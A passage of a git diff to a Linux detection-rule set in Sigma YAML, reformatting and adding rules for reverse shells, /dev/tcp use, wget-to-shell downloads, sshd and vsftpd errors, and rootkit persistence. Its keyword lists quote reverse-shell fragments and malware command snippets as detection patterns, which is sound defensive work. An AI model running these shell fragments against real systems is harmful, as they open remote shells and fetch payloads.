http://pastebin.com/FtygZ1cg + - https://artkond.com/2017/03/23/pivoting-guide/ +author: Florian Roth (Nextron Systems) date: 2017/08/21 modified: 2021/11/27 +tags: + - attack.execution + - attack.t1059.004 logsource: - product: linux + product: linux detection: - keywords: + keywords: # Generic suspicious commands - - 'wget * - http* | perl' - - 'wget * - http* | sh' - - 'wget * - http* | bash' - - 'python -m SimpleHTTPServer' - - '-m http.server' # Python 3 - - 'import pty; pty.spawn*' - - 'socat exec:*' - - 'socat -O /tmp/*' - - 'socat tcp-connect*' - - '*echo binary >>*' + - 'wget * - http* | perl' + - 'wget * - http* | sh' + - 'wget * - http* | bash' + - 'python -m SimpleHTTPServer' + - '-m http.server' # Python 3 + - 'import pty; pty.spawn*' + - 'socat exec:*' + - 'socat -O /tmp/*' + - 'socat tcp-connect*' + - '*echo binary >>*' # Malware - - '*wget *; chmod +x*' - - '*wget *; chmod 777 *' - - '*cd /tmp || cd /var/run || cd /mnt*' + - '*wget *; chmod +x*' + - '*wget *; chmod 777 *' + - '*cd /tmp || cd /var/run || cd /mnt*' # Apache Struts in-the-wild exploit codes - - '*stop;service iptables stop;*' - - '*stop;SuSEfirewall2 stop;*' - - 'chmod 777 2020*' - - '*>>/etc/rc.local' + - '*stop;service iptables stop;*' + - '*stop;SuSEfirewall2 stop;*' + - 'chmod 777 2020*' + - '*>>/etc/rc.local' # Metasploit framework exploit codes - - '*base64 -d /tmp/*' - - '* | base64 -d *' - - '*/chmod u+s *' - - '*chmod +s /tmp/*' - - '*chmod u+s /tmp/*' - - '* /tmp/haxhax*' - - '* /tmp/ns_sploit*' - - 'nc -l -p *' - - 'cp /bin/ksh *' - - 'cp /bin/sh *' - - '* /tmp/*.b64 *' - - '*/tmp/ysocereal.jar*' - - '*/tmp/x *' - - '*; chmod +x /tmp/*' - - '*;chmod +x /tmp/*' - condition: keywords + - '*base64 -d /tmp/*' + - '* | base64 -d *' + - '*/chmod u+s *' + - '*chmod +s /tmp/*' + - '*chmod u+s /tmp/*' + - '* /tmp/haxhax*' + - '* /tmp/ns_sploit*' + - 'nc -l -p *' + - 'cp /bin/ksh *' + - 'cp /bin/sh *' + - '* /tmp/*.b64 *' + - '*/tmp/ysocereal.jar*' + - '*/tmp/x *' + - '*; chmod +x /tmp/*' + - '*;chmod +x /tmp/*' + condition: keywords falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.execution - - attack.t1059.004 diff --git a/src/main/resources/rules/linux/builtin/lnx_shell_susp_log_entries.yml b/src/main/resources/rules/linux/builtin/lnx_shell_susp_log_entries.yml index 7501d26ed..caa3385ba 100644 --- a/src/main/resources/rules/linux/builtin/lnx_shell_susp_log_entries.yml +++ b/src/main/resources/rules/linux/builtin/lnx_shell_susp_log_entries.yml @@ -2,20 +2,24 @@ title: Suspicious Log Entries id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1 status: test description: Detects suspicious log entries in Linux log files -author: Florian Roth +references: + - https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml +author: Florian Roth (Nextron Systems) date: 2017/03/25 modified: 2021/11/27 +tags: + - attack.impact logsource: - product: linux + product: linux detection: - keywords: - - entered promiscuous mode - - Deactivating service - - Oversized packet received from - - imuxsock begins to drop messages - condition: keywords + keywords: + # Generic suspicious log lines + - 'entered promiscuous mode' + # OSSEC https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml + - 'Deactivating service' + - 'Oversized packet received from' + - 'imuxsock begins to drop messages' + condition: keywords falsepositives: - - Unknown + - Unknown level: medium -tags: - - attack.impact diff --git a/src/main/resources/rules/linux/builtin/lnx_shell_susp_rev_shells.yml b/src/main/resources/rules/linux/builtin/lnx_shell_susp_rev_shells.yml index e8fe87ee7..58d50b2a2 100644 --- a/src/main/resources/rules/linux/builtin/lnx_shell_susp_rev_shells.yml +++ b/src/main/resources/rules/linux/builtin/lnx_shell_susp_rev_shells.yml @@ -2,44 +2,44 @@ title: Suspicious Reverse Shell Command Line id: 738d9bcf-6999-4fdb-b4ac-3033037db8ab status: test description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell -author: Florian Roth references: - - https://alamot.github.io/reverse_shells/ + - https://alamot.github.io/reverse_shells/ +author: Florian Roth (Nextron Systems) date: 2019/04/02 modified: 2021/11/27 +tags: + - attack.execution + - attack.t1059.004 logsource: - product: linux + product: linux detection: - keywords: - - 'BEGIN {s = "/inet/tcp/0/' - - 'bash -i >& /dev/tcp/' - - 'bash -i >& /dev/udp/' - - 'sh -i >$ /dev/udp/' - - 'sh -i >$ /dev/tcp/' - - '&& while read line 0<&5; do' - - '/bin/bash -c exec 5<>/dev/tcp/' - - '/bin/bash -c exec 5<>/dev/udp/' - - 'nc -e /bin/sh ' - - '/bin/sh | nc' - - 'rm -f backpipe; mknod /tmp/backpipe p && nc ' - - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))' - - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' - - '/bin/sh -i <&3 >&3 2>&3' - - 'uname -a; w; id; /bin/bash -i' - - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};' - - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');' - - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' - - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print' - - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:' - - 'rm -f /tmp/p; mknod /tmp/p p &&' - - ' | /bin/bash | telnet ' - - ',echo=0,raw tcp-listen:' - - 'nc -lvvp ' - - 'xterm -display 1' - condition: keywords + keywords: + - 'BEGIN {s = "/inet/tcp/0/' + - 'bash -i >& /dev/tcp/' + - 'bash -i >& /dev/udp/' + - 'sh -i >$ /dev/udp/' + - 'sh -i >$ /dev/tcp/' + - '&& while read line 0<&5; do' + - '/bin/bash -c exec 5<>/dev/tcp/' + - '/bin/bash -c exec 5<>/dev/udp/' + - 'nc -e /bin/sh ' + - '/bin/sh | nc' + - 'rm -f backpipe; mknod /tmp/backpipe p && nc ' + - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))' + - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' + - '/bin/sh -i <&3 >&3 2>&3' + - 'uname -a; w; id; /bin/bash -i' + - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};' + - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');' + - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' + - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print' + - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:' + - 'rm -f /tmp/p; mknod /tmp/p p &&' + - ' | /bin/bash | telnet ' + - ',echo=0,raw tcp-listen:' + - 'nc -lvvp ' + - 'xterm -display 1' + condition: keywords falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.execution - - attack.t1059.004 diff --git a/src/main/resources/rules/linux/builtin/lnx_shellshock.yml b/src/main/resources/rules/linux/builtin/lnx_shellshock.yml index 13ed22033..8e9b5d2f4 100644 --- a/src/main/resources/rules/linux/builtin/lnx_shellshock.yml +++ b/src/main/resources/rules/linux/builtin/lnx_shellshock.yml @@ -1,12 +1,15 @@ title: Shellshock Expression id: c67e0c98-4d39-46ee-8f6b-437ebf6b950e -status: experimental +status: test description: Detects shellshock expressions in log files -author: Florian Roth -date: 2017/03/14 -modified: 2021/04/28 references: - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf +author: Florian Roth (Nextron Systems) +date: 2017/03/14 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1505.003 logsource: product: linux detection: @@ -19,6 +22,3 @@ detection: falsepositives: - Unknown level: high -tags: - - attack.persistence - - attack.t1505.003 diff --git a/src/main/resources/rules/linux/builtin/lnx_space_after_filename_.yml b/src/main/resources/rules/linux/builtin/lnx_space_after_filename_.yml index c963868b7..722dd1e67 100644 --- a/src/main/resources/rules/linux/builtin/lnx_space_after_filename_.yml +++ b/src/main/resources/rules/linux/builtin/lnx_space_after_filename_.yml @@ -2,21 +2,21 @@ title: Space After Filename id: 879c3015-c88b-4782-93d7-07adf92dbcb7 status: test description: Detects space after filename -author: Ömer Günal references: - - https://attack.mitre.org/techniques/T1064 + - https://attack.mitre.org/techniques/T1064 +author: Ömer Günal date: 2020/06/17 modified: 2021/11/27 +tags: + - attack.execution logsource: - product: linux + product: linux detection: - selection1: - - 'echo "*" > * && chmod +x *' - selection2: - - 'mv * "* "' - condition: selection1 and selection2 + selection1: + - 'echo "*" > * && chmod +x *' + selection2: + - 'mv * "* "' + condition: all of selection* falsepositives: - - Typos + - Typos level: low -tags: - - attack.execution diff --git a/src/main/resources/rules/linux/builtin/lnx_susp_dev_tcp.yml b/src/main/resources/rules/linux/builtin/lnx_susp_dev_tcp.yml index 3c9b00d8c..d8f68a34f 100644 --- a/src/main/resources/rules/linux/builtin/lnx_susp_dev_tcp.yml +++ b/src/main/resources/rules/linux/builtin/lnx_susp_dev_tcp.yml @@ -1,31 +1,31 @@ title: Suspicious Use of /dev/tcp id: 6cc5fceb-9a71-4c23-aeeb-963abe0b279c -status: experimental +status: test description: Detects suspicious command with /dev/tcp -author: frack113 references: - - https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/ - - https://book.hacktricks.xyz/shells/shells/linux - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md#atomic-test-1---port-scan + - https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/ + - https://book.hacktricks.xyz/shells/shells/linux + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan +author: frack113 date: 2021/12/10 -modified: 2022/01/10 +modified: 2023/01/06 +tags: + - attack.reconnaissance logsource: - product: linux + product: linux detection: - keyword: - - 'cat /dev/tcp/' - - 'echo >/dev/tcp/' - - 'bash -i >& /dev/tcp/' - - 'sh -i >& /dev/udp/' - - '0<&196;exec 196<>/dev/tcp/' - - 'exec 5<>/dev/tcp/' - - '(sh)0>/dev/tcp/' - - 'bash -c ''bash -i >& /dev/tcp/' - - 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/' - condition: 1 of keyword + keywords: + - 'cat /dev/tcp/' + - 'echo >/dev/tcp/' + - 'bash -i >& /dev/tcp/' + - 'sh -i >& /dev/udp/' + - '0<&196;exec 196<>/dev/tcp/' + - 'exec 5<>/dev/tcp/' + - '(sh)0>/dev/tcp/' + - 'bash -c ''bash -i >& /dev/tcp/' + - 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/' + condition: keywords falsepositives: - - Unknown + - Unknown level: medium -tags: - - attack.reconnaissance diff --git a/src/main/resources/rules/linux/builtin/lnx_susp_jexboss.yml b/src/main/resources/rules/linux/builtin/lnx_susp_jexboss.yml index 118ed0cd3..eceedcdb6 100644 --- a/src/main/resources/rules/linux/builtin/lnx_susp_jexboss.yml +++ b/src/main/resources/rules/linux/builtin/lnx_susp_jexboss.yml @@ -2,22 +2,22 @@ title: JexBoss Command Sequence id: 8ec2c8b4-557a-4121-b87c-5dfb3a602fae status: test description: Detects suspicious command sequence that JexBoss -author: Florian Roth references: - - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A + - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A +author: Florian Roth (Nextron Systems) date: 2017/08/24 -modified: 2021/11/27 +modified: 2022/07/07 +tags: + - attack.execution + - attack.t1059.004 logsource: - product: linux + product: linux detection: - selection1: - - 'bash -c /bin/bash' - selection2: - - '&/dev/tcp/' - condition: selection1 and selection2 + selection1: + - 'bash -c /bin/bash' + selection2: + - '&/dev/tcp/' + condition: all of selection* falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.execution - - attack.t1059.004 diff --git a/src/main/resources/rules/linux/builtin/lnx_symlink_etc_passwd.yml b/src/main/resources/rules/linux/builtin/lnx_symlink_etc_passwd.yml index 4e26563e6..75393a3b9 100644 --- a/src/main/resources/rules/linux/builtin/lnx_symlink_etc_passwd.yml +++ b/src/main/resources/rules/linux/builtin/lnx_symlink_etc_passwd.yml @@ -2,21 +2,21 @@ title: Symlink Etc Passwd id: c67fc22a-0be5-4b4f-aad5-2b32c4b69523 status: test description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd -author: Florian Roth references: - - https://www.qualys.com/2021/05/04/21nails/21nails.txt + - https://www.qualys.com/2021/05/04/21nails/21nails.txt +author: Florian Roth (Nextron Systems) date: 2019/04/05 modified: 2021/11/27 +tags: + - attack.t1204.001 + - attack.execution logsource: - product: linux + product: linux detection: - keywords: - - 'ln -s -f /etc/passwd' - - 'ln -s /etc/passwd' - condition: keywords + keywords: + - 'ln -s -f /etc/passwd' + - 'ln -s /etc/passwd' + condition: keywords falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.t1204.001 - - attack.execution diff --git a/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml b/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml new file mode 100644 index 000000000..f9c561aaa --- /dev/null +++ b/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml @@ -0,0 +1,22 @@ +title: SSHD Error Message CVE-2018-15473 +id: 4c9d903d-4939-4094-ade0-3cb748f4d7da +status: test +description: Detects exploitation attempt using public exploit code for CVE-2018-15473 +references: + - https://github.com/Rhynorater/CVE-2018-15473-Exploit +author: Florian Roth (Nextron Systems) +date: 2017/08/24 +modified: 2021/11/27 +tags: + - attack.reconnaissance + - attack.t1589 +logsource: + product: linux + service: sshd +detection: + keywords: + - 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]' + condition: keywords +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml b/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml new file mode 100644 index 000000000..8584d39b6 --- /dev/null +++ b/src/main/resources/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml @@ -0,0 +1,33 @@ +title: Suspicious OpenSSH Daemon Error +id: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc +status: test +description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts +references: + - https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c + - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml +author: Florian Roth (Nextron Systems) +date: 2017/06/30 +modified: 2021/11/27 +tags: + - attack.initial_access + - attack.t1190 +logsource: + product: linux + service: sshd +detection: + keywords: + - 'unexpected internal error' + - 'unknown or unsupported key type' + - 'invalid certificate signing key' + - 'invalid elliptic curve value' + - 'incorrect signature' + - 'error in libcrypto' + - 'unexpected bytes remain after decoding' + - 'fatal: buffer_get_string: bad string' + - 'Local: crc32 compensation attack' + - 'bad client public DH value' + - 'Corrupted MAC on input' + condition: keywords +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml b/src/main/resources/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml similarity index 85% rename from src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml rename to src/main/resources/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml index d95240e1b..20808e855 100644 --- a/src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml +++ b/src/main/resources/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml @@ -1,25 +1,25 @@ -title: Sudo Privilege Escalation CVE-2019-14287 +title: Sudo Privilege Escalation CVE-2019-14287 - Builtin id: 7fcc54cb-f27d-4684-84b7-436af096f858 related: - id: f74107df-b6c6-4e80-bf00-4170b658162b type: derived -status: experimental +status: test description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 -author: Florian Roth -date: 2019/10/15 -modified: 2021/11/11 references: - https://www.openwall.com/lists/oss-security/2019/10/14/1 - https://access.redhat.com/security/cve/cve-2019-14287 - https://twitter.com/matthieugarin/status/1183970598210412546 -logsource: - product: linux - service: sudo +author: Florian Roth (Nextron Systems) +date: 2019/10/15 +modified: 2022/11/26 tags: - attack.privilege_escalation - attack.t1068 - attack.t1548.003 - cve.2019.14287 +logsource: + product: linux + service: sudo detection: selection_user: USER: diff --git a/src/main/resources/rules/linux/other/lnx_security_tools_disabling_syslog.yml b/src/main/resources/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml similarity index 56% rename from src/main/resources/rules/linux/other/lnx_security_tools_disabling_syslog.yml rename to src/main/resources/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml index 096ab0368..0ae57f854 100644 --- a/src/main/resources/rules/linux/other/lnx_security_tools_disabling_syslog.yml +++ b/src/main/resources/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml @@ -1,15 +1,15 @@ -title: Disabling Security Tools +title: Disabling Security Tools - Builtin id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 related: - id: e3a8a052-111f-4606-9aee-f28ebeb76776 type: derived -status: experimental +status: test description: Detects disabling security tools +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md author: Ömer Günal, Alejandro Ortuno, oscd.community date: 2020/06/17 -modified: 2021/09/14 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md +modified: 2022/11/26 tags: - attack.defense_evasion - attack.t1562.004 @@ -18,11 +18,11 @@ logsource: service: syslog detection: keywords: - - '*stopping iptables*' - - '*stopping ip6tables*' - - '*stopping firewalld*' - - '*stopping cbdaemon*' - - '*stopping falcon-sensor*' + - 'stopping iptables' + - 'stopping ip6tables' + - 'stopping firewalld' + - 'stopping cbdaemon' + - 'stopping falcon-sensor' condition: keywords falsepositives: - Legitimate administration activities diff --git a/src/main/resources/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml b/src/main/resources/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml new file mode 100644 index 000000000..86afe19fd --- /dev/null +++ b/src/main/resources/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml @@ -0,0 +1,24 @@ +title: Suspicious Named Error +id: c8e35e96-19ce-4f16-aeb6-fd5588dc5365 +status: test +description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts +references: + - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml +author: Florian Roth (Nextron Systems) +date: 2018/02/20 +modified: 2022/10/05 +tags: + - attack.initial_access + - attack.t1190 +logsource: + product: linux + service: syslog +detection: + keywords: + - ' dropping source port zero packet from ' + - ' denied AXFR from ' + - ' exiting (due to fatal error)' + condition: keywords +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml b/src/main/resources/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml new file mode 100644 index 000000000..bbdfe379f --- /dev/null +++ b/src/main/resources/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml @@ -0,0 +1,38 @@ +title: Suspicious VSFTPD Error Messages +id: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe +status: test +description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts +references: + - https://github.com/dagwieers/vsftpd/ +author: Florian Roth (Nextron Systems) +date: 2017/07/05 +modified: 2021/11/27 +tags: + - attack.initial_access + - attack.t1190 +logsource: + product: linux + service: vsftpd +detection: + keywords: + - 'Connection refused: too many sessions for this address.' + - 'Connection refused: tcp_wrappers denial.' + - 'Bad HTTP verb.' + - 'port and pasv both active' + - 'pasv and port both active' + - 'Transfer done (but failed to open directory).' + - 'Could not set file modification time.' + - 'bug: pid active in ptrace_sandbox_free' + - 'PTRACE_SETOPTIONS failure' + - 'weird status:' + - 'couldn''t handle sandbox event' + - 'syscall * out of bounds' + - 'syscall not permitted:' + - 'syscall validate failed:' + - 'Input line too long.' + - 'poor buffer accounting in str_netfd_alloc' + - 'vsf_sysutil_read_loop' + condition: keywords +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/file_create/file_create_lnx_cron_files.yml b/src/main/resources/rules/linux/file_create/file_create_lnx_cron_files.yml deleted file mode 100644 index 03ac93263..000000000 --- a/src/main/resources/rules/linux/file_create/file_create_lnx_cron_files.yml +++ /dev/null @@ -1,32 +0,0 @@ -title: Cron Files -id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05 -status: experimental -description: Detects creation of cron files or files in Cron directories. Potential persistence. -date: 2021/10/15 -author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC -tags: - - attack.persistence - - attack.t1053.003 -references: - - https://github.com/microsoft/MSTIC-Sysmon/blob/main/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml -logsource: - product: linux - category: file_create -detection: - selection1: - TargetFilename|startswith: - - '/etc/cron.d/' - - '/etc/cron.daily/' - - '/etc/cron.hourly/' - - '/etc/cron.monthly/' - - '/etc/cron.weekly/' - - '/var/spool/cron/crontabs/' - selection2: - TargetFilename|contains: - - '/etc/cron.allow' - - '/etc/cron.deny' - - '/etc/crontab' - condition: selection1 or selection2 -falsepositives: - - Any legitimate cron file. -level: medium diff --git a/src/main/resources/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml similarity index 92% rename from src/main/resources/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml rename to src/main/resources/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml index 11c4e0635..be5bdee6f 100644 --- a/src/main/resources/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml +++ b/src/main/resources/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml @@ -7,12 +7,13 @@ references: - https://www.makeuseof.com/how-to-install-and-use-doas/ author: Sittikorn S, Teoderick Contreras date: 2022/01/20 +modified: 2022/12/31 tags: - attack.privilege_escalation - attack.t1548 logsource: product: linux - category: file_create + category: file_event detection: selection: TargetFilename|endswith: '/etc/doas.conf' diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml new file mode 100644 index 000000000..cd9e431c8 --- /dev/null +++ b/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml @@ -0,0 +1,33 @@ +title: Persistence Via Cron Files +id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05 +status: test +description: Detects creation of cron file or files in Cron directories which could indicates potential persistence. +references: + - https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/10/15 +modified: 2022/12/31 +tags: + - attack.persistence + - attack.t1053.003 +logsource: + product: linux + category: file_event +detection: + selection1: + TargetFilename|startswith: + - '/etc/cron.d/' + - '/etc/cron.daily/' + - '/etc/cron.hourly/' + - '/etc/cron.monthly/' + - '/etc/cron.weekly/' + - '/var/spool/cron/crontabs/' + selection2: + TargetFilename|contains: + - '/etc/cron.allow' + - '/etc/cron.deny' + - '/etc/crontab' + condition: 1 of selection* +falsepositives: + - Any legitimate cron file. +level: medium diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml new file mode 100644 index 000000000..1ba00ab8e --- /dev/null +++ b/src/main/resources/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml @@ -0,0 +1,22 @@ +title: Persistence Via Sudoers Files +id: ddb26b76-4447-4807-871f-1b035b2bfa5d +status: test +description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. +references: + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/05 +modified: 2022/12/31 +tags: + - attack.persistence + - attack.t1053.003 +logsource: + product: linux + category: file_event +detection: + selection: + TargetFilename|startswith: '/etc/sudoers.d/' + condition: selection +falsepositives: + - Creation of legitimate files in sudoers.d folder part of administrator work +level: medium diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml new file mode 100644 index 000000000..533c0c4ed --- /dev/null +++ b/src/main/resources/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml @@ -0,0 +1,27 @@ +title: Potentially Suspicious Shell Script Creation in Profile Folder +id: 13f08f54-e705-4498-91fd-cce9d9cee9f1 +status: experimental +description: Detects the creation of shell scripts under the "profile.d" path. +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.persistence +logsource: + product: linux + category: file_event +detection: + selection: + TargetFilename|contains: '/etc/profile.d/' + TargetFilename|endswith: + - '.csh' + - '.sh' + condition: selection +falsepositives: + - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events. + - Regular file creation during system update or software installation by the package manager +level: low # Can be increased to a higher level after some tuning diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml new file mode 100644 index 000000000..4c56cf49f --- /dev/null +++ b/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml @@ -0,0 +1,21 @@ +title: Triple Cross eBPF Rootkit Default LockFile +id: c0239255-822c-4630-b7f1-35362bcb8f44 +status: test +description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. +references: + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33 +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/05 +modified: 2022/12/31 +tags: + - attack.defense_evasion +logsource: + product: linux + category: file_event +detection: + selection: + TargetFilename: '/tmp/rootlog' + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml new file mode 100644 index 000000000..81fc28ec8 --- /dev/null +++ b/src/main/resources/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml @@ -0,0 +1,24 @@ +title: Triple Cross eBPF Rootkit Default Persistence +id: 1a2ea919-d11d-4d1e-8535-06cda13be20f +status: test +description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method +references: + - https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/05 +modified: 2022/12/31 +tags: + - attack.persistence + - attack.defense_evasion + - attack.t1053.003 + +logsource: + product: linux + category: file_event +detection: + selection: + TargetFilename|endswith: 'ebpfbackdoor' + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml b/src/main/resources/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml new file mode 100644 index 000000000..facf55864 --- /dev/null +++ b/src/main/resources/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml @@ -0,0 +1,27 @@ +title: Wget Creating Files in Tmp Directory +id: 35a05c60-9012-49b6-a11f-6bab741c9f74 +status: experimental +description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp" +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - 